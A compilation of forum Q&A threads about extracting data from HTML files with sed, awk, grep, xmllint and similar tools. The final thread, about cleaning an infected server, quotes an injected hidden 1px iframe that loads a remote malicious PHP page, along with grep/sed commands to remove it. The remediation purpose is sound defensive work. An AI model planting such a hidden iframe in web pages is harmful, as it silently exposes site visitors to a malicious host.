Extract data from a webpage - web-scraping

I have about 10000 html downloaded files. They have a section of html code like this:
<tr>
<td width="10%" valign="top"><p>City:</p></td>
<td colspan="2"><p>
London
</p></td>
</tr>
What I need is a way of getting the cities from all the files. I'm using linux so I was thinking in using some batch file to do it with sed but sed doesn't work well with these files because of some encoding issues (some cities have accents like Jérica and it wouldn't find their names).
What's the proper way of doing it?

Well the most reliable way to do this would be to use an HTML (or XML) parser.
However, if the HTML is always formatted the same way, i.e. like this:
<tr>
<td width="10%" valign="top"><p>City:</p></td>
<td colspan="2"><p>
*******
</p></td>
</tr>
with the city name appearing where the asterisks are, then the following one-liner should work:
cat *.html |grep -A2 '<p>City' |tail -n1 |sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'

Related

Download web page and remove content except for one html table

I am given a large html report from another department quite regularly that requires a fair amount of manual work to edit into a format that is required.
I'd like to work a bit smarter. I can download the page via:
wget -qO- <https://the_page.html>
However I just want to carve out a table that begins:
<!-- START Daily Keystroke
It goes on and on for many lines of html and always ends:
</table>
</div>
</div>
Before the next load of data is begun. I need everything in between these patterns in one chunk of text /file.
I played around with sed and awk which I am not really familiar with but it seems without knowing how many lines are going to be in the file each time these tools are not appropriate for this task. It seems something that can work more on specific patterns is appropriate.
That being the case I can install other utilities potentially. If anyone has any experience of something that might work?
I played around with sed and awk
Be warned that these are best suited for working with things which might be described using regular expressions, HTML could not be. HTML parsers are devices which are destined for usage with HTML documents. Generally you should avoid using regular expression for dealing with Chomsky Type-2 contraptions.
That being the case I can install other utilities potentially. If
anyone has any experience of something that might work?
I suggest trying hxselect as it allows easy extraction of element(s) matching CSS selector. It does use stdin so you might pipe output into it, consider following example: I want to download www.example.com page and extract its' title tag, then I can do:
wget -q -O - https://www.example.com | hxselect -i 'title'
if you encounter some ill-formed HTML you might use hxclean which will try to make it acceptable to hxselect like so
wget -q -O - https://www.example.com | hxclean | hxselect -i 'title'
If either of above works with your URL then you might start looking for CSS selector which describe only table you want to extract. See CSS selectors reference for available features. I am unable to craft selector without seeing whole source of page.
Suggesting gawk cutting on first multi-line record. Followed by sed, head trimming till <!-- ....
gawk 'NR==1{print}' RS="</table>\n</div>\n</div>" input.html |sed '0,/<!-- START Daily Keystroke/d'
Or without intermediate file:
wget -qO- <https://the_page.html>| \
gawk 'NR==1{print}' RS="</table>\n</div>\n</div>" | \
sed '0,/<!-- START Daily Keystroke/d'
This script, tested to work with provided sample text.
gawk Explanation:
The gawk script cuts input text in first occurrence of.
</table>
</div>
</div>
Aligned to the left margin.
NR==1{print}
Print gawk record number 1 only.
The first record is identify by all text (many lines), terminated with matched pattern in RS variable.
RS="</table>\n</div>\n</div>"
A regular expression (RegExp) That match the gawk multi-line record separator.
In case you want to include indenting whitespaces in the RegExp. Try:
</table>
</div>
</div>
RS="[[:space:]]*</table>[[:space:]]*\n[[:space:]]*</div>[[:space:]]*\n[[:space:]]*</div>"
sed Explanation:
Remove all line till first occurrence of RegExp <!-- START Daily Keystroke
0,/<!-- START Daily Keystroke/
sed lines range. Starting from line 0, till first line that match <!-- START Daily Keystroke/
d
Delete/ignore all lines in range.

Scraping 5 characters off a webpage using sed or something better?

I have a downloaded webpage I would like to scrape using sed or awk. I have been told by a colleague that what I'm trying to achieve isn't possible with sed and maybe this is probably correct seeing as he is a bit of a linux guru.
What I am trying to achieve:
I am trying to scrape a locally stored html document for every value within this html label which apppears hundreds of times on a webpage..
For example:
<label class="css-l019s7">54321</label>
<label class="css-l019s7">55555</label>
This label class never changes, so it seems the perfect point to do scraping and get the values:
54321
55555
There are hundreds of occurences of this data and I need to get a list of them all.
As sed probably isn't capable of this, I would be forever greatful if someone could demonstrate AWK or something else?
Thank you.
Things I've tried:
sed -En 's#(^.*<label class=\"css-l019s7\">)(.*)(</label>.*$)#\2#gp' TS.html
This code above managed to extract about 40 of the numbers out of 320. There must be a little bug in this sed command for it to work partially.
Use a parser like xmllint:
xmllint --html --recover --xpath '//label[#class="css-l019s7"]/text()' TS.html
As an interest in sed was expressed (note that html can use newlines instead of spaces, for example, so this is not very robust):
sed 't a
s/<label class="css-l019s7">\([^<]*\)/\
\1\
/;D
:a
P;D' TS.html
Using awk:
awk '$1~/^label class="css-l019s7"$/ { print $2 }' RS='<' FS='>' TS.html
or:
awk '$1~/^[\t\n\r ]*label[\t\n\r ]/ &&
$1~/[\t\n\r ]class[\t\n\r ]*=[\t\n\r ]*"css-l019s7"[\t\n\r ]*([\t\n\r ]|$)/ {
print $2
}' RS='<' FS='>' TS.html
someone could demonstrate AWK or something else?
This task seems for me as best fit for using CSS selector. If you are allowed to install tools you might use Element Finder for this following way:
elfinder -s "label.css-l019s7"
which will search for labels with class css-l019s7 in files in current directory.
with grep you can get the values
grep -Eo '([[:digit:]]{5})' file
54321
55555
with awk you can concrete where the values are, here in the lines with label at the beginning and at the end:
awk '/^<label|\/label>$/ {if (match($0,/[[:digit:]]{5}/)) { pattern = substr($0,RSTART,RLENGTH); print pattern}}' file
54321
55555
using GNU awk and gensub:
awk '/label class/ && /css-l019s7/ { str=gensub("(<label class=\"css-l019s7\">)(.*)(</label>)","\\2",$0);print str}' file
Search for lines with "label class" and "css=1019s7". Split the line into three sections and substitute the line for the second section, reading the result into a variable str. Print str.

using sed with echo and reading from a file

I want to delete directory path except the file name using sed from an html file. The path looks like:
<a href="/dir1/dir2/file.mp3" other_tags_here </a>
with spaces (%) and other characters in the directory and file names. eg.
<a href="/1-%one%2026/two%20_three%four/1-%eight.mp3"
I just need to keep <a href="1-%eight.mp3" other_tags_here <a/>. When I try
echo '<a href=/1-%one%2026/two%20_three%four/1-%eight.mp3' | sed 's|href="/.*/.*/|href="|g'
it works fine. However when I read from the html file
sed 's|href="/.*/.*/|href="|g' file.html
it deletes every thing after href= and returns only href=. How do I correct this ?
In sed, regexes match the leftmost longest match. That means that the final .*/ in your regex will match to the final / on the line. To prevent that:
sed 's|href="/[^/]*/[^/]*/|href="|g' file.html
The regex [^/]*/ will match to the next / only.
In languages like python or perl we can address this issue by using non-greedy regexes. Because sed does not support non-greedy regexes, we must try to achieve a similar effect using tricks like [^/]*/.
Standard Warning: In general, html format can be very complex with lots of special cases that regexes are ill-suited to handle.
When working with html, it is generally best to use html-specific tools (like python's beautifulsoup).

Xmlstarlet fails to preserve original formatting (windows)

I have an xml document that I'm using xmlstarlet to edit, removing the surrounding C tags if a descendant tag contains a matching text.
Sample xml file:
<a>
<b>
<c><d>RED</d></c>
<c><d>BLUE</d></c>
</b>
</a>
Using the xpath syntax:
//d[text()='RED']/ancestor::c[1]
I am able to delete the nearest c tag which has a d tag with text 'RED' with the xmlstarlet arguments:
xml ed -P -O --inplace --delete //d[text()='RED']/ancestor::c[1]
The problem is that the original formatting is not preserved, as the 'P' switch is supposed to ensure, with the output file missing newlines and looking something like:
<a> <b> <c><d>BLUE</d></c> </b></a>
Note that I've been using notepad to check the formatting before and after the edit. Any suggestions for how to get xmlstarlet to preserve the original formatting would be appreciated.

Looking for script to delete iframe malware from linux server

I'm looking for a script to delete the following iframe malware from my linux server:
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
It has infected hundreads of files on my server on different websites. I tried
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
but it just outputs:
sed: -e expression #1, char 49: unknown option to `s'
Appreciate your help :)
Cheers
Dee
Unescape the backslashes from the url in the sed regex.
This should be a more generic solution. Effectively what the malware does is look for the </body> and inject the iframe it just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'
I found this other question on renaming the malware files is also useful to quickly take down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked

Resources